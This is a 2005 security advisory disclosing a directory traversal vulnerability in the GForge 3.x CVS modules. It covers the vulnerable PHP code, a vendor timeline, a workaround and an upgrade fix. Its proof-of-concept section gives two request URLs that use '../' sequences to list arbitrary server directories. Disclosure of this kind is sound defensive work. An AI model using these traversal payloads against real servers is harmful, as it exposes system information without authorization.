STG Security Advisory: [SSA-20050120-24] GForge 3.x directory traversal
vulnerability.

Revision 1.0
Date Published: 2005-01-20 (KST)
Last Update: 2005-01-20 (KST)
Disclosed by SSR Team (advisory@stgsecurity.com)

Summary
========
GForge is a software to help collaborative development for software
communities. The software provides a full configured development system with
tools for communication and version control among members of a development
team on a web site.  GForge CVS modules have a directory traversal
vulnerability exploited by malicious attackers.

Vulnerability Class
===================
Implementation Error: Input validation flaw

Impact
======
Low : arbitrary directory list disclosure.

Affected Products
================
GForge 3.3 and prior

Not Affected Products
=====================
GForge 4.0 and posterior

Vendor Status: FIXED (GForge 4.0)
====================
2004-12-28 Vulnerability found
2004-12-28 Developers (Dragos Moinescu, Ronald Petty) contacted and
confirmed.
2004-12-28 Dragos Moinescu suggested the workaround of his module.
2004-12-29 Vendor contacted.
2005-01-20 Official release.

Details
=======
GForge CVS module made by Dragos Moinescu and another module made by Ronald
Petty have a directory traversal vulnerability.

$GFORGE/www/scm/controller.php doesn't sanitize $dir variable.
- ---
if(!$dir) {
  $dir = $cvsroot;
  $files = retrieveDir($dir);
...snip...
} else {
  $files = retrieveDir($dir);
- ---

$GFORGE/www/scm/controlleroo.php doesn't sanitize $dir_name variable.
- ---
$DIRNAME = ($dir_name != "")?"/$dir_name":"";
$DIRNAME = $CVSROOT.$DIRNAME;
$DIRPATH = explode("/",$dir_name);
echo("Current directory: ");
for($i=0;$i<count($DIRPATH);$i++)
{
...snip...
if(false === ($dirContent = $DHD->readDirectory($DIRNAME)))
  echo("Error: ".$DHD->getError());
...snip...
foreach($dirContent AS $k=>$v)
{
...snip...
$fileLink = ...snip...
- ---

If register_globals = On (in php.ini), malicious attackers can read
arbitrary directory lists.

Proof of Concept
================
1) http://[victim]/scm/controller.php?group_id=[number]
&dir=/cvsroot/[project]/CVSROOT/../../../../../

2) http://[victim]/scm/controlleroo.php?group_id=[number]
&dir_name=../../../&hide_attic=0

Solution
========
Upgrade to GForge 4.x

Workaround
==========
Dragos Moinescu suggested the workaround of his module.
- ---
modify $GFORGE/common/include/cvsweb/DirectoryHandler.class
function openDirectory()
{
  if($this->__DIR_NAME == "" || strstr($this->__DIR_NAME, ".."))
  {
    $this->setError("You must provide a valid directory name");
    return false;
  }
- ---

But, above workaround doesn't remove the vulnerability in controller.php (by
Ronald Petty).

You can restrict users to use only cvsweb.
modify $GFORGE/www/scm/index.php (follow this step).
1) find '<a href="/scm/controller.php' and delete the found line.
2) find '<a href="/scm/controlleroo.php' and delete the found line.
3) delete controller.php, controlleroo.php, viewFile.php.

Vendor URL
==========
http://www.gforge.org/

Credits
======
Jeremy Bae at STG Security